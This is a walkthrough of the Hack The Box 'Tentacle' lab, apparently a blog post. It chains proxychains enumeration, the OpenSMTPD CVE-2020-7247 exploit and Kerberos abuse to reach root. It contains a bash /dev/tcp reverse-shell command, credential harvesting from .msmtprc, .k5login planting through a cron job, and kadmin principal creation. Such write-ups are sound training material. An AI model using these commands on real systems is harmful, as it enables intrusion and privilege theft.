In this post, i would like to share a walkthrough on Tentacle Machine.

This room has been considered difficulty rated as a Hard machine

Information Gathering on Tentacle

Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN

We need to whitelist the domain name for the machine such as REALCORP.HTB

Let’s open the browser and straight into the website interface.

Let’s try to enumerate more on the website by using the command gobuster dns -d <url> -w /SecLists/Discovery/DNS/subdomains-top1million-11000.txt

No result output has been shown over here.

Let’s try a different method to get the subdomain of the machine by executing dnsenum –thread 64 –dnsserver –file /SecLists/Discovery/DNS/subdomains-top1million-11000.txt realcorp.htb

The result of the domain can be seen below:

proxy.realcorp.htb.               ns.realcorp.htb

Let’s open the browser and straight into the website interface.

The Website interface shows a 403 Forbidden error which we found nothing useful over here.

However, the subdomain wpad has caught my attention for a while now. Let’s do some research on it.

I have found that WPAD is a short form of Web Proxy Auto-Discovery Protocol which you can read more on WPAD findings over here

When thinking hard, I do remember that there’s a tool called proxy chains to enumerate more on the machine.

Gaining Access to Tentacle machine

For those who are not familiar with proxy chains, we can read more on the tools over here

We need to install proxychains4 by executing sudo apt-get install proxychains4. In my case, the tools have been installed before.

We can see if the proxychains4 has been successfully installed in the machine by running the command proxychains4 shown in the screenshot above.

We need to configure the /etc/proxychains4.conf with the IP that we found on dnsenum at the bottom of the file

http 3128
http 3128
http 3128

Enumerate with proxy chains on the machine

Let’s do the scanning back with the Nmap command using proxychains4 tools on tentacle machine. The Nmap result came out the same except we found out there’s a new port is open which is 80/tcp open http

The website still appear 403 Forbidden error on the wpad.realcorp.htb

For this enumeration process, we will be using tools the tool’s purpose would be something such as below

“dirsearch” is a mature command-line tool designed to brute force directories and files in webservers.

From the resulting output, we found out that /wpad.dat is the only file detected during the enumeration process let’s go to the URL wpad.realcorp.htb/wpad.dat to see what is saved on the file

A pop-up asking whether we want to save the file or not into our machine.

When we open the wpad.dat, we notice that the IP address and domain name is been saved on the file in programming format.

We need to find out about other IP addresses besides what we already found now. After a while, we found that there was another new IP Address which is

I did some enumeration on the IP Address that we found, and we found out that port 25 is open on the

We must start the nc listener on the machine to get the reverse shell connection back to us.

We notice that port 25 is running OpenSMTPD and do some research on it

I found that there’s an exploit on the OpenSMTPD on the internet.

Trying to exploit using cve-2020-7247

There are a lot of usable exploits that can be found on the internet, but I will be using this exploit here to proceed further. We can download the exploit into our machine by executing git clone

After i have done studying the exploit, we need to modify the code so that the exploit will work as we planned.

We can execute the exploit by running the command such as below:

proxychains -f /etc/proxychains.conf python3 25 'bash -c "exec bash -i &> /dev/tcp/<VPN's IP Address/<PORT> <&1"'

When we investigate our reverse shell terminal, we have the shell back

We found out that we access the machine via root@smtp which find suspicious because too early to get root.

Let’s see on the /root/ directory and we found nothing stored there.

Maintaining Access to the Tentacle machine

We can go to /home/j.nakazawa directory and there’s a file name that caught my attention such as .msmtprc

We can open the .msmtprc file by running the command “cat .msmtprc

Oh wow! We got the credentials such as the user and password that have been shown above.

Let’s access the machine with j.nakazawa credentials via ssh service and unfortunately, we cannot access the machine via ssh service.

Based on the password that has been found on /home/j.nakazawa/.msmtprc, i notice that the password has been saved in Kerberos formatting

Playing with the Kerberos tool on the machine

In my research, i found out that krb5 is included in the Kerberos which we need to install on the machine.

We can install it by using the command sudo apt-get install krb5-user

Once we have successfully downloaded, we need to modify the /etc/krb5.conf by adding the following

default_realm = REALCORP.HTB
        kdc =

We also need to add realcorp.htb srv01.realcorp.htb

Honestly, i don’t have any knowledge of how to create a ticket using Kerberos. As a result, let’s do some further research on it

We managed to learn how to create a Kerberos Ticket on this website

Exploiting with kinit and klist function on the machine

We need to create the ticket by using the command kinit j.nakazawa with the password that we found earlier

I can see the available ticket by running the command klist

Let’s try to access the machine via ssh j.nakazawa@realcorp.htb

Sadly, we cannot access the machine with the password found earlier.

Let’s troubleshoot the issues by running the command ssh -v and the error log such as Server krbtgt/HTB@REALCORP.HTB not found in the Kerberos database

I have banged my head multiple times and stuck on the issues for around 12 hours.

After 12 hours stuck on the issues, i have decided to use the config such as srv01.realcorp.htb on the /etc/hosts

Next, we re-try creating the ticket by using kinit j.nakazawa with the password found and klist command.

Let’s try again to access the machine via ssh j.nakazawa@ and we have finally accessed the machine.

We can read the user flag by going to /home/j.nakazawa directory and use the command “cat user.txt

Escalate to Root Privileges Access on Tentacle machine

Normally, there’s something interesting on /opt/ directory

Let’s go to the /etc/ directory and try to look at whatever can be useful to us to escalate the privileges access.

We found a file called crontab and for those who are not familiar with Linux Operating System, crontab is a table of the list of tasks scheduled to run at regular time intervals on the system

Let’s open the crontab file and we notice there’s a directory at the bottom of the file which leads to /usr/local/bin/

We can read the file that is located inside the /usr/local/bin/ directory. While reading the bash file, i notice that everything stored in /var/log/squid will be transferred to /home/admin

Let’s create a file that contains the username of the machine (j.nakazawa@realcorp.htb) and save it as. k5login.

When i try to list down the file and I got an error saying permission denied

Let’s create the same command as previously on /home/j.nakazawa and the file is stored there.

So, let’s copy the .k5login into the /var/log/squid

Let’s try to ssh to admin privileges at srv01.realcorp.htb and it works like charm!

We try to look at what has been stored here and we found two squid log files in this directory

Play with the klist command

We will continue doing some research with the klist command which can be found here

Let’s see the principal that is stored inside the /etc/krb5.keytab by using the command klist -k /etc/krb5.keytab

Some research on kadmin command is found over here

We can create a new principal by executing the following command

kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTB

How to escalate to root from here?

We will be learning on ksu command which can be read here

From the article that i read, we need to execute ksu root to escalate to root privileges access. We will be asking for a password where the password is the same as we configure previously during the kadmin command.

We can read the root flag by going to /root/ directory and using the command “cat root.txt”


Happy Learning Guys!

Extra Information on

We can get the root hashes at /etc/shadow which it will be using as the password to read this write-up